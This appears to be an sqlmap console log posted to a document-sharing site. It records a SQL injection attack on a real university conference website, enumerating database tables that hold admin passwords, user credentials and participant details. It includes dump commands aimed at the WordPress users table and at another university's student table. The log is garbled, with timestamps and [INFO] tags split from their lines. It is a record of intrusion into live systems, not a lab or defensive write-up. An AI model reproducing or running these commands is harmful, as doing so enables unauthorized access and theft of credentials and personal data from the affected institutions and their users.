[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

fetching columns for table 'wp_options' in database 'elite' the SQL query used returns 4 entries retrieved: "option_id","bigint(20) unsigned" retrieved: "option_name","varchar(191)" retrieved: "option_value","longtext" retrieved: "autoload","varchar(20)" fetching columns for table 'wp_comments' in database 'elite' the SQL query used returns 15 entries retrieved: "comment_ID","bigint(20) unsigned" retrieved: "comment_post_ID","bigint(20) unsigned" retrieved: "comment_author","tinytext" retrieved: "comment_author_email","varchar(100)" retrieved: "comment_author_url","varchar(200)" retrieved: "comment_author_IP","varchar(100)" retrieved: "comment_date","datetime" retrieved: "comment_date_gmt","datetime" retrieved: "comment_content","text" retrieved: "comment_karma","int(11)" retrieved: "comment_approved","varchar(20)" retrieved: "comment_agent","varchar(255)" retrieved: "comment_type","varchar(20)" retrieved: "comment_parent","bigint(20) unsigned" retrieved: "user_id","bigint(20) unsigned" fetching columns for table 'tbl_reviewer' in database 'elite' the SQL query used returns 5 entries retrieved: "id","int(255)" retrieved: "uid","varchar(255)" retrieved: "name1","varchar(255)" retrieved: "email1","varchar(255)" retrieved: "invited","int(255)" fetching columns for table 'tbl_visitors' in database 'elite' the SQL query used returns 6 entries retrieved: "id","int(13)" retrieved: "date","varchar(255)" retrieved: "time","varchar(255)" retrieved: "ip","varchar(255)" retrieved: "new_ip","varchar(255)" retrieved: "hostname","varchar(255)" fetching columns for table 'tbl_files' in database 'elite' the SQL query used returns 25 entries retrieved: "id","int(255)" retrieved: "uid","varchar(255)" retrieved: "date","varchar(255)" retrieved: "time","varchar(255)" retrieved: "ip","varchar(255)" retrieved: "hostname","varchar(255)" retrieved: "showname","text" retrieved: "filename","text" retrieved: "filesize","varchar(255)" retrieved: "filetype","varchar(255)" retrieved: "tipe","varchar(255)" retrieved: "owner","varchar(255)" retrieved: "regcode","varchar(255)" retrieved: "count","int(255)" retrieved: "info","text" retrieved: "filetitle","text" retrieved: "fileabstract","text" retrieved: "filekeyword","text" retrieved: "group","varchar(255)" retrieved: "grup","varchar(255)"

[09:44:27] [09:44:27] [09:44:28] [09:44:28] [09:44:29] [09:44:29] [09:44:30] [09:44:30] [09:44:30] [09:44:30] [09:44:30] ' [09:44:30] [09:44:30] [09:44:31] [09:44:31] [09:44:31] [09:44:31] [09:44:32] [09:44:32] [09:44:32] [09:44:33] [09:44:33] [09:44:34] [09:44:34] [09:44:35] [09:44:35] [09:44:36] [09:44:36] [09:44:37] [09:44:37] [09:44:38] [09:44:38] [09:44:39] [09:44:39] [09:44:40] [09:44:40] [09:44:41] [09:44:41] [09:44:42] [09:44:42] [09:44:43] [09:44:43] [09:44:44] [09:44:44] [09:44:45] [09:44:45] [09:44:45] [09:44:46] [09:44:46] [09:44:47] [09:44:47] [09:44:48] [09:44:48] [09:44:49] [09:44:49] [09:44:49] [09:44:50] [09:44:50] [09:44:51]

[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

retrieved: "allauthors","text" retrieved: "topic","varchar(255)" retrieved: "abstract_uid","varchar(255)" retrieved: "reviewed","varchar(1)" retrieved: "assigned","varchar(255)" fetching columns for table 'tbl_topic' in database 'elite' the SQL query used returns 3 entries retrieved: "id","int(10)" retrieved: "uid","varchar(255)" retrieved: "topic","varchar(255)" fetching columns for table 'wp_commentmeta' in database 'elite

[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

the SQL query used returns 4 entries retrieved: "meta_id","bigint(20) unsigned" retrieved: "comment_id","bigint(20) unsigned" retrieved: "meta_key","varchar(255)" retrieved: "meta_value","longtext" fetching columns for table 'tbl_system' in database 'elite' the SQL query used returns 25 entries retrieved: "id","int(255)" retrieved: "mainpage","text" retrieved: "password_admin","varchar(255)" retrieved: "bigtitle","varchar(255)" retrieved: "smalltitle","varchar(255)" retrieved: "committee_email","varchar(255)" retrieved: "webmaster_email","varchar(255)" retrieved: "system_email","varchar(255)" retrieved: "headerpic","varchar(255)" retrieved: "finance","text" retrieved: "var1","varchar(255)" retrieved: "var2","varchar(255)" retrieved: "var3","varchar(255)" retrieved: "var4","varchar(255)" retrieved: "var5","varchar(255)" retrieved: "var5b","varchar(255)" retrieved: "var6","varchar(255)" retrieved: "var7","varchar(255)" retrieved: "var8","varchar(255)" retrieved: "var9","varchar(255)" retrieved: "var10","varchar(255)" retrieved: "var11","varchar(255)" retrieved: "var12","varchar(255)" retrieved: "var13","varchar(10)" retrieved: "var14","varchar(10)" fetching columns for table 'wp_posts' in database 'elite' the SQL query used returns 23 entries retrieved: "ID","bigint(20) unsigned" retrieved: "post_author","bigint(20) unsigned" retrieved: "post_date","datetime" retrieved: "post_date_gmt","datetime" retrieved: "post_content","longtext" retrieved: "post_title","text" retrieved: "post_excerpt","text" retrieved: "post_status","varchar(20)" retrieved: "comment_status","varchar(20)" retrieved: "ping_status","varchar(20)" retrieved: "post_password","varchar(20)" retrieved: "post_name","varchar(200)" retrieved: "to_ping","text" retrieved: "pinged","text"

[09:44:51] [INFO] retrieved: "post_modified","datetime" [09:44:52] [INFO] retrieved: "post_modified_gmt","datetime" [09:44:52] [INFO] retrieved: "post_content_filtered","longtext" [09:44:53] [INFO] retrieved: "post_parent","bigint(20) unsigned" [09:44:53] [INFO] retrieved: "guid","varchar(255)" [09:44:54] [INFO] retrieved: "menu_order","int(11)" [09:44:54] [INFO] retrieved: "post_type","varchar(20)" [09:44:55] [INFO] retrieved: "post_mime_type","varchar(100)" [09:44:55] [INFO] retrieved: "comment_count","bigint(20)" [09:44:55] [INFO] fetching columns for table 'wp_term_relationships' in database 'elite' [09:44:55] [INFO] the SQL query used returns 3 entries [09:44:56] [INFO] retrieved: "object_id","bigint(20) unsigned" [09:44:56] [INFO] retrieved: "term_taxonomy_id","bigint(20) unsigned" [09:44:56] [INFO] retrieved: "term_order","int(11)" [09:44:56] [INFO] fetching columns for table 'wp_termmeta' in database 'elite' [09:44:57] [INFO] the SQL query used returns 4 entries [09:44:57] [INFO] retrieved: "meta_id","bigint(20) unsigned" [09:44:57] [INFO] retrieved: "term_id","bigint(20) unsigned" [09:44:57] [INFO] retrieved: "meta_key","varchar(255)" [09:44:57] [INFO] retrieved: "meta_value","longtext" Database: elite Table: tbl_reviewer [5 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | email1 | varchar(255) | | id | int(255) | | invited | int(255) | | name1 | varchar(255) | | uid | varchar(255) | +---------+--------------+ Database: elite Table: tbl_participants [26 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | date | varchar(255) | | time | varchar(255) | | city | varchar(255) | | country | varchar(255) | | email | varchar(255) | | fax | varchar(255) | | fee | varchar(255) | | from_internal | varchar(255) | | hostname | varchar(255) | | id | int(255) | | info | text | | institution | text | | ip | varchar(255) | | is_presenter | varchar(255) | | name1 | varchar(255) | | name2 | varchar(255) | | name3 | varchar(255) | | password2 | varchar(255) | | phone | varchar(255) | | procbook | varchar(255) |

| registered | varchar(255) | | street | varchar(255) | | title | varchar(255) | | uid | varchar(255) | | userid | varchar(255) | | zipcode | varchar(255) | +---------------+--------------+ Database: elite Table: wp_term_taxonomy [6 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | count | bigint(20) | | description | longtext | | parent | bigint(20) unsigned | | taxonomy | varchar(32) | | term_id | bigint(20) unsigned | | term_taxonomy_id | bigint(20) unsigned | +------------------+---------------------+ Database: elite Table: wp_commentmeta [4 columns] +------------+---------------------+ | Column | Type | +------------+---------------------+ | comment_id | bigint(20) unsigned | | meta_id | bigint(20) unsigned | | meta_key | varchar(255) | | meta_value | longtext | +------------+---------------------+ Database: elite Table: tbl_system [25 columns] +-----------------+--------------+ | Column | Type | +-----------------+--------------+ | bigtitle | varchar(255) | | committee_email | varchar(255) | | finance | text | | headerpic | varchar(255) | | id | int(255) | | mainpage | text | | password_admin | varchar(255) | | smalltitle | varchar(255) | | system_email | varchar(255) | | var1 | varchar(255) | | var10 | varchar(255) | | var11 | varchar(255) | | var12 | varchar(255) | | var13 | varchar(10) | | var14 | varchar(10) | | var2 | varchar(255) | | var3 | varchar(255) | | var4 | varchar(255) | | var5 | varchar(255) | | var5b | varchar(255) |

| var6 | varchar(255) | | var7 | varchar(255) | | var8 | varchar(255) | | var9 | varchar(255) | | webmaster_email | varchar(255) | +-----------------+--------------+ Database: elite Table: tbl_paper_reviewer [6 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | id | int(255) | | paper_uid | varchar(255) | | review | text | | reviewer_name | varchar(255) | | reviewer_uid | varchar(255) | | uid | varchar(255) | +---------------+--------------+ Database: elite Table: wp_users [10 columns] +---------------------+---------------------+ | Column | Type | +---------------------+---------------------+ | display_name | varchar(250) | | ID | bigint(20) unsigned | | user_activation_key | varchar(255) | | user_email | varchar(100) | | user_login | varchar(60) | | user_nicename | varchar(50) | | user_pass | varchar(255) | | user_registered | datetime | | user_status | int(11) | | user_url | varchar(100) | +---------------------+---------------------+ C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr act.php?id=78 -D elite -T wp_users -C user_email,user_login,user_pass, --dump Database: elite Table: wp_terms [4 columns] +------------+---------------------+ | Column | Type | +------------+---------------------+ | name | varchar(200) | | slug | varchar(200) | | term_group | bigint(10) | | term_id | bigint(20) unsigned | +------------+---------------------+ Database: elite Table: wp_links [13 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | link_description | varchar(255) | | link_id | bigint(20) unsigned |

| link_image | varchar(255) | | link_name | varchar(255) | | link_notes | mediumtext | | link_owner | bigint(20) unsigned | | link_rating | int(11) | | link_rel | varchar(255) | | link_rss | varchar(255) | | link_target | varchar(25) | | link_updated | datetime | | link_url | varchar(255) | | link_visible | varchar(20) | +------------------+---------------------+ Database: elite Table: wp_comments [15 columns] +----------------------+---------------------+ | Column | Type | +----------------------+---------------------+ | comment_agent | varchar(255) | | comment_approved | varchar(20) | | comment_author | tinytext | | comment_author_email | varchar(100) | | comment_author_IP | varchar(100) | | comment_author_url | varchar(200) | | comment_content | text | | comment_date | datetime | | comment_date_gmt | datetime | | comment_ID | bigint(20) unsigned | | comment_karma | int(11) | | comment_parent | bigint(20) unsigned | | comment_post_ID | bigint(20) unsigned | | comment_type | varchar(20) | | user_id | bigint(20) unsigned | +----------------------+---------------------+ Database: elite Table: wp_options [4 columns] +--------------+---------------------+ | Column | Type | +--------------+---------------------+ | autoload | varchar(20) | | option_id | bigint(20) unsigned | | option_name | varchar(191) | | option_value | longtext | +--------------+---------------------+ Database: elite Table: wp_usermeta [4 columns] +------------+---------------------+ | Column | Type | +------------+---------------------+ | meta_key | varchar(255) | | meta_value | longtext | | umeta_id | bigint(20) unsigned | | user_id | bigint(20) unsigned | +------------+---------------------+

Database: elite Table: tbl_files [25 columns] +--------------+--------------+ | Column | Type | +--------------+--------------+ | count | int(255) | | date | varchar(255) | | group | varchar(255) | | time | varchar(255) | | abstract_uid | varchar(255) | | allauthors | text | | assigned | varchar(255) | | fileabstract | text | | filekeyword | text | | filename | text | | filesize | varchar(255) | | filetitle | text | | filetype | varchar(255) | | grup | varchar(255) | | hostname | varchar(255) | | id | int(255) | | info | text | | ip | varchar(255) | | owner | varchar(255) | | regcode | varchar(255) | | reviewed | varchar(1) | | showname | text | | tipe | varchar(255) | | topic | varchar(255) | | uid | varchar(255) | +--------------+--------------+ Database: elite Table: tbl_abstract [18 columns] +--------------+--------------+ | Column | Type | +--------------+--------------+ | date | varchar(255) | | time | varchar(255) | | accepted | varchar(1) | | authors | text | | code1 | varchar(255) | | content | text | | hostname | varchar(255) | | id | int(10) | | institutions | text | | ip | varchar(255) | | keywords | varchar(255) | | last_update | varchar(255) | | payment | varchar(255) | | presenter | varchar(255) | | title | text | | topic | varchar(255) | | uid | varchar(255) | | uid_owner | varchar(255) | +--------------+--------------+ Database: elite

Table: tbl_topic [3 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | id | int(10) | | topic | varchar(255) | | uid | varchar(255) | +--------+--------------+ Database: elite Table: wp_postmeta [4 columns] +------------+---------------------+ | Column | Type | +------------+---------------------+ | meta_id | bigint(20) unsigned | | meta_key | varchar(255) | | meta_value | longtext | | post_id | bigint(20) unsigned | +------------+---------------------+ Database: elite Table: tbl_visitors [6 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | date | varchar(255) | | time | varchar(255) | | hostname | varchar(255) | | id | int(13) | | ip | varchar(255) | | new_ip | varchar(255) | +----------+--------------+ Database: elite Table: wp_posts [23 columns] +-----------------------+---------------------+ | Column | Type | +-----------------------+---------------------+ | comment_count | bigint(20) | | comment_status | varchar(20) | | guid | varchar(255) | | ID | bigint(20) unsigned | | menu_order | int(11) | | ping_status | varchar(20) | | pinged | text | | post_author | bigint(20) unsigned | | post_content | longtext | | post_content_filtered | longtext | | post_date | datetime | | post_date_gmt | datetime | | post_excerpt | text | | post_mime_type | varchar(100) | | post_modified | datetime | | post_modified_gmt | datetime | | post_name | varchar(200) | | post_parent | bigint(20) unsigned |

| post_password | varchar(20) | | post_status | varchar(20) | | post_title | text | | post_type | varchar(20) | | to_ping | text | +-----------------------+---------------------+ Database: elite Table: wp_term_relationships [3 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | object_id | bigint(20) unsigned | | term_order | int(11) | | term_taxonomy_id | bigint(20) unsigned | +------------------+---------------------+ Database: elite Table: wp_termmeta [4 columns] +------------+---------------------+ | Column | Type | +------------+---------------------+ | meta_id | bigint(20) unsigned | | meta_key | varchar(255) | | meta_value | longtext | | term_id | bigint(20) unsigned | +------------+---------------------+ [09:44:57] [INFO] fetched data logged to text files under 'C:\Users\SRS\.sqlmap\ output\elite.event.uinjkt.ac.id' [*] shutting down at 09:44:57 C:\>Python27\sqlmap\sqlmap.py -u http://akademik.fh.unsoed.ac.id/lowongan.php?id =110 -D c1akademikfh -T mahasiswa -C --dump

View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF